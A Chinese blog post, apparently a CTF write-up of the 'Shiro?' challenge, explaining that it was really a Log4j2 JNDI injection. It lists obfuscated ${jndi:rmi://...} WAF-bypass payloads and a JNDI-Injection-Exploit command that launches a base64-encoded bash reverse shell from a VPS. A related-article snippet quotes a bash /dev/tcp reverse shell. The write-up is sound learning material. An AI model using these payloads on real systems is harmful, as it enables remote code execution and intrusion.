长安战疫 shiro?

最新推荐文章于 2024-07-07 17:31:31 发布
最新推荐文章于 2024-07-07 17:31:31 发布
阅读量283 收藏
点赞数 1
分类专栏: ctf 文章标签: log4j2 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122607304
版权

1NDEX

0x00

之前没复现log4j
然后看题目是shiro 测了一下发现有的
但是好像卵用没用…
弹不出来 很多命令执行了也没反应
然后纯坐牢
在这里插入图片描述

0x01 复现

后面看了才知道是log4j
后悔一开始没好好复现

关于log4j的一些基础

之前写过一篇

https://blog.csdn.net/weixin_45751765/article/details/122534971?spm=1001.2014.3001.5502

是有waf的
在这里插入图片描述
payload变种

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1099/ass}
${${::-j}ndi:rmi://127.0.0.1:1099/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

第一个就能用

VPS上起个evil-ldap
工具地址

  • https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxx(base64编码payload)}|{base64,-d}|{bash,-i}" -A "xxxx(VPS地址)"
关于为什么要base64编码payload

避免空格以及重定位符号的影响

详见

https://www.jackson-t.ca/runtime-exec-payloads.html

在这里插入图片描述

发包
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
done

参考文章

https://www.cnblogs.com/peace-and-romance/p/15717457.html

0x02 rethink

休整完了 重开了

k_du1t
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
长安战疫网络安全卫士守护赛 Shiro?
FSecurity的博客
01-14 2623
赛题:Shiro? 需要准备的环境: 反弹shell需要准备VPS、JNDI-Injection-Exploit工具启动rmi和ldap服务 JNDI-Injection-Exploit 需要jdk、mvn环境编译 VPS centos7 mvn jdk 打开赛题 测试存在漏洞 这里我用的是VPS的外网地址 成功获取到请求响应 反弹shell步骤 bash -i >&/dev/tcp/x.x.x.x/1111 0>&1 bash -c {echo,上面命令base64编码
shiro介绍
weixin_59196705的博客
04-28 1222
什么是shiro Shiro是apache旗下一个开源框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证,权限授权、加密、会话管理等功能,组成了一个通用的安全认证框架。 官方地址:Apache Shiro | Simple. Java. Security. 为什么要学shiro 既然shiro安全认证相关的功能抽取出来组成一个框架,使用shiro就可以非常快速的完成认证、授权等功能的开发,降低系统成本。 shiro使用广泛,shiro可以运行在web应用,非web应用,集群分布式应
Apache Log4j2 RCE漏洞利用反弹shell合集
good good study
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
什么是Shiro?Shiro有什么特点?
Aa112233aA1的博客
05-17 1606
1.Shiro简介 【1】什么是Shiro? Shiro是apache旗下一个开源框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证,权限授权、加密、会话管理等功能,组成了一个通用的安全认证框架。 【2】Shiro 的特点 Shiro 是一个强大而灵活的开源安全框架,能够非常清晰的处理认证、授权、管理会话以及密码加密。如下是它所具有的特点: · 易于理解的 Java Security API; · 简单的身份认证(登录),支持多种数据源(LDAP,JDBC 等); · 对角色的简单的签权(访问
什么是shiroShiro能干嘛?
m0_67390963的博客
04-11 1619
1, 什么是shiro Apache Shiro 是Java 的一个安全框架。Shiro 可以非常容易的开发出足够好的应用,其不仅可以用在JavaSE 环境,也可以用在JavaEE 环境。Shiro 可以帮助我们完成:认证、授权、加密、会话管理、与Web 集成、缓存等。 2,为什么要学shiro 1,既然shiro安全认证相关的功能抽取出来组成一个框架,使用shiro就可以非常快速的完成认证、授权等功能的开发,降低系统成本。 2,shiro使用广泛,shiro可以运行在web应用,非web应用,集群分布式
Shiro
书启鸿蒙知秋枫
08-13 1789
一、权限控制 1、什么是权限管理 2、用户的认证 3、用户的授权 4、权限控制的实现方案 5、权限控制的数据库设计 二、Shiro基本概念 Shiro官网:http://shiro.apache.org/ 中文帮助文档:http://greycode.github.io/shiro/doc/reference.html 2.1 Shiro 介绍 Apache Shiro (发音为“shee-roh”,日语......
一篇适合小白的Shiro教程
热门推荐
潮汐先生的专栏
12-02 6万+
Shiro的基本使用Shiro简介什么是ShiroShiro核心架构SubjectSecurityManagerAuthenticatorAuthorizerRealmSessionManagerSessionDAOCacheManagerCryptographyShiro中的认证什么是认证三个概念SubjectPrincipalcredential认证的实现Shiro认证的源码分析Shiro使用自定义Relam实现认证CustomerRealmCustomerRealmAuthenticatorTest测
shiro原理
代码审计
04-27 2600
https://github.com/feihong-cs/ShiroExploit 环境搭建: docker pull medicean/vulapps:s_shiro_1 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 shiro 原理 如何快速判断目标网站是否使用shiro组件 命令安装 docker pull medicean/vulapps:s_shiro_1 命令: docker run -d -p 80:8080 medicean/v
shiro漏洞检测工具
08-10
shiro漏洞检测工具,找了一个18M左右的不好用,经验证这个好用,不会报找不到类错误。
shiro1.7.1.zip
04-12
在使用Shiro 1.7.1时,开发者可以根据具体需求选择合适的模块进行集成,例如,Web应用可能会主要依赖`shiro-core`、`shiro-web`和`shiro-spring`,而需要进行复杂加密操作的应用可能需要`shiro-crypto-hash`和`shiro...
shiro1.5.3
05-11
Apache Shiro 是一个强大且易用的Java安全框架,提供了认证、授权、加密和会话管理功能,可以非常轻松地开发出足够安全的应用。你提到的 "shiro1.5.3" 是Shiro框架的一个特定版本,包含了该版本的所有核心组件和相关...
shiro1.6版本
09-07
Apache Shiro 是一个强大且易用的Java安全框架,提供了身份验证、授权、加密和会话管理功能,简化了企业级应用的安全实现。在本文中,我们将深入探讨Apache Shiro 1.6版本的重要更新,以及它如何修复了一个绕过认证...
shiro1.9.1源码及jar
08-25
目前无漏洞版本shiro1.9.1源码+jar
网络安全测评技术与标准
weixin_48579910的博客
07-06 651
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
【网络安全】实验一(网络拓扑环境的搭建)
Elena's Blog
07-07 244
学习利用 VMware 创建虚拟环境学习利用 VMware 搭建各自网络拓扑环境。
有2000元的不死高防吗
m0_70754056的博客
07-04 215
在网上搜索高防服务时,我们经常看到有死扛ddos攻击,无视cc攻击 打不死的服务器等字眼,我们必须保持清醒的头脑,因为市场上充斥着各种以低价诱人却暗藏陷阱的所谓“高防产品”。让我们擦亮眼睛,拒绝低价诱惑,为我们的网络世界构建真正坚实可靠的防护堡垒。记住,没有 2000 块的不死高防产品,只有踏实的投入和专业的服务才能保障我们的网络安全。真正有效的高防服务,需要强大的技术支持、硬件设施以及持续的维护和更新。结果在遭受严重的 DDoS 攻击时,所谓的高防形同虚设,导致业务中断,客户流失,造成了无法挽回的损失。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 895
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】实验七(ISA防火墙的规则设置)
最新发布
Elena's Blog
07-07 540
打开两台虚拟机,并参照下图,搭建网络拓扑环境,要求两台虚拟机的IP地址要按照图中的标识进行设置,并根据搭建完成情况,勾选对应选项。注:此处的学号=本人学号的最后两位数字,1学号=本人学号的最后两位数字+100。(1)将host1的IP地址设置为172.16.学号.学号(2)将host2的IP地址设置为172.16.学号.1学号(3)将防火墙的内网IP地址设置为172.16.学号.250,IP地址设置为192.168.17.1学号(4)在防火墙上配置路由功能,并使内、外网之间能互相PING通(1)
shiro的工作原理?
08-09
Shiro是一个Java安全框架,它提供了身份验证、授权、加密和会话管理等功能。其工作原理可以概括为以下几个步骤: 1. Subject:Shiro的核心对象是Subject,代表着当前用户。Subject可以是一个人、一台设备或者一个第三方进程。 2. SecurityManager:Subject与SecurityManager进行交互,SecurityManager是Shiro的核心组件之一。它负责管理所有的Subject,并协调其安全操作。 3. Realm:Realm是Shiro与应用程序进行交互的桥梁,负责认证和授权。当Subject进行登录时,Realm会验证其身份信息,并返回相应的用户信息给SecurityManager。 4. Authenticator:Authenticator是负责认证的组件,它接收从Realm中获取的用户信息,进行身份验证。Authenticator可以使用多种验证方式,如用户名密码验证、单点登录等。 5. Authorizer:Authorizer

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值